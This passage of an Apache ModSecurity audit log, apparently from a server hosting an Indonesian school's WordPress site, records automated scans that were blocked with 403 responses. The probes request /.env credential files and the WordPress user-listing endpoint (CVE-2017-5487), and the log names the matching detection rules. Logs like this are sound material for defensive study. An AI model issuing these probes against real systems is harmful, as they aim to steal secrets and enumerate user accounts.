(CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748633840525318 4398 (- - -) Stopwatch2: 1748633840525318 4398; combined=2188, p1=740, p2=1415, p3=0, p4=0, p5=33, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fa56a13-Z-- --83bfed2e-A-- [31/May/2025:03:15:05 +0700] aDoRyR_L2Rte6DjSjWYjRgAAAIE 103.236.140.4 60072 103.236.140.4 8181 --83bfed2e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 188.166.111.71 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 188.166.111.71 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --83bfed2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83bfed2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748636105414820 1506 (- - -) Stopwatch2: 1748636105414820 1506; combined=630, p1=574, p2=0, p3=0, p4=0, p5=56, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83bfed2e-Z-- --b999703f-A-- [31/May/2025:03:56:53 +0700] aDoblVbZTRMbIzLSWp58gQAAANQ 103.236.140.4 39026 103.236.140.4 8181 --b999703f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 6.0; zh-CN; KNT-UL10 Build/HUAWEIKNT-UL10) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 Quark/3.0.2.943 Mobile Safari/537.36 Accept-Charset: utf-8 --b999703f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b999703f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748638613104912 808 (- - -) Stopwatch2: 1748638613104912 808; combined=325, p1=288, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b999703f-Z-- --a3924461-A-- [31/May/2025:04:38:08 +0700] aDolQFbZTRMbIzLSWp59YwAAAMs 103.236.140.4 41936 103.236.140.4 8181 --a3924461-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.95.24.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.95.24.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a3924461-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3924461-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748641088352400 2631 (- - -) Stopwatch2: 1748641088352400 2631; combined=1332, p1=405, p2=897, p3=0, p4=0, p5=29, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3924461-Z-- --9253d349-A-- [31/May/2025:05:23:53 +0700] aDov-Z3Kgs4r2wz12c5_1AAAAAc 103.236.140.4 46234 103.236.140.4 8181 --9253d349-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.255.9.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.255.9.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9253d349-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9253d349-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748643833911719 2984 (- - -) Stopwatch2: 1748643833911719 2984; combined=1258, p1=436, p2=792, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9253d349-Z-- --57e8273b-A-- [31/May/2025:06:14:39 +0700] aDo73-g1nD2n5twq7Nsq9wAAAFY 103.236.140.4 49558 103.236.140.4 8181 --57e8273b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 182.253.128.32 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 182.253.128.32 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --57e8273b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57e8273b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748646879896490 764 (- - -) Stopwatch2: 1748646879896490 764; combined=322, p1=284, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57e8273b-Z-- --7628720e-A-- [31/May/2025:06:14:40 +0700] aDo74J3Kgs4r2wz12c6AuwAAAA4 103.236.140.4 49562 103.236.140.4 8181 --7628720e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 182.253.128.32 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 182.253.128.32 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --7628720e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7628720e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748646880003034 682 (- - -) Stopwatch2: 1748646880003034 682; combined=280, p1=245, p2=0, p3=0, p4=0, p5=35, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7628720e-Z-- --82142a1c-A-- [31/May/2025:06:16:43 +0700] aDo8W1bZTRMbIzLSWp5_5wAAAM4 103.236.140.4 49686 103.236.140.4 8181 --82142a1c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 182.253.128.32 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 182.253.128.32 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --82142a1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82142a1c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748647003092192 752 (- - -) Stopwatch2: 1748647003092192 752; combined=351, p1=312, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82142a1c-Z-- --39e5ae28-A-- [31/May/2025:06:16:43 +0700] aDo8W1bZTRMbIzLSWp5_6AAAANE 103.236.140.4 49690 103.236.140.4 8181 --39e5ae28-B-- GET /sendgrid/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 182.253.128.32 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 182.253.128.32 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --39e5ae28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39e5ae28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748647003147756 640 (- - -) Stopwatch2: 1748647003147756 640; combined=259, p1=226, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39e5ae28-Z-- --52240c1f-A-- [31/May/2025:06:16:43 +0700] aDo8W53Kgs4r2wz12c6AvwAAABQ 103.236.140.4 49694 103.236.140.4 8181 --52240c1f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 182.253.128.32 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 182.253.128.32 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --52240c1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52240c1f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748647003207601 644 (- - -) Stopwatch2: 1748647003207601 644; combined=250, p1=219, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52240c1f-Z-- --f2500b0a-A-- [31/May/2025:06:26:23 +0700] aDo-n1bZTRMbIzLSWp6AJgAAANE 103.236.140.4 50382 103.236.140.4 8181 --f2500b0a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.169.97.249 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.169.97.249 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f2500b0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2500b0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748647583047948 3182 (- - -) Stopwatch2: 1748647583047948 3182; combined=1434, p1=490, p2=911, p3=0, p4=0, p5=32, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2500b0a-Z-- --5d2e9c21-A-- [31/May/2025:06:28:55 +0700] aDo_N53Kgs4r2wz12c6A_gAAAAU 103.236.140.4 50514 103.236.140.4 8181 --5d2e9c21-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5d2e9c21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d2e9c21-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748647735373329 3582 (- - -) Stopwatch2: 1748647735373329 3582; combined=1562, p1=487, p2=1038, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d2e9c21-Z-- --9981f950-A-- [31/May/2025:06:46:48 +0700] aDpDaB_L2Rte6DjSjWYm2QAAAIc 103.236.140.4 51694 103.236.140.4 8181 --9981f950-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.233.84.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.233.84.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9981f950-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9981f950-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748648808637722 2699 (- - -) Stopwatch2: 1748648808637722 2699; combined=1465, p1=444, p2=991, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9981f950-Z-- --cd0e195c-A-- [31/May/2025:08:33:19 +0700] aDpcX53Kgs4r2wz12c6DGgAAABQ 103.236.140.4 58848 103.236.140.4 8181 --cd0e195c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 188.166.111.71 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 188.166.111.71 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --cd0e195c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd0e195c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748655199063806 837 (- - -) Stopwatch2: 1748655199063806 837; combined=338, p1=301, p2=0, p3=0, p4=0, p5=37, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd0e195c-Z-- --cd0ab21d-A-- [31/May/2025:08:34:07 +0700] aDpcj53Kgs4r2wz12c6DIAAAAAQ 103.236.140.4 58882 103.236.140.4 8181 --cd0ab21d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.199.97.24 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.199.97.24 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cd0ab21d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd0ab21d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748655247104188 3410 (- - -) Stopwatch2: 1748655247104188 3410; combined=1462, p1=481, p2=949, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd0ab21d-Z-- --740ca37c-A-- [31/May/2025:08:47:25 +0700] aDpfrR_L2Rte6DjSjWYnjAAAAI8 103.236.140.4 59656 103.236.140.4 8181 --740ca37c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.243.190.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.243.190.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --740ca37c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --740ca37c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748656045384410 2814 (- - -) Stopwatch2: 1748656045384410 2814; combined=1245, p1=424, p2=791, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --740ca37c-Z-- --45eebd2e-A-- [31/May/2025:09:22:12 +0700] aDpn1J3Kgs4r2wz12c6EcwAAABE 103.236.140.4 33554 103.236.140.4 8181 --45eebd2e-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 142.93.143.8 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 142.93.143.8 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --45eebd2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45eebd2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748658132165326 769 (- - -) Stopwatch2: 1748658132165326 769; combined=307, p1=269, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45eebd2e-Z-- --25ca0b13-A-- [31/May/2025:09:24:47 +0700] aDpob-g1nD2n5twq7NsutgAAAFI 103.236.140.4 33740 103.236.140.4 8181 --25ca0b13-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.0.2.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.0.2.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --25ca0b13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25ca0b13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748658287484675 2801 (- - -) Stopwatch2: 1748658287484675 2801; combined=1252, p1=412, p2=810, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25ca0b13-Z-- --bb533b61-A-- [31/May/2025:10:22:10 +0700] aDp14p3Kgs4r2wz12c6FBQAAAAQ 103.236.140.4 36462 103.236.140.4 8181 --bb533b61-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 193.203.224.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.203.224.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bb533b61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb533b61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] 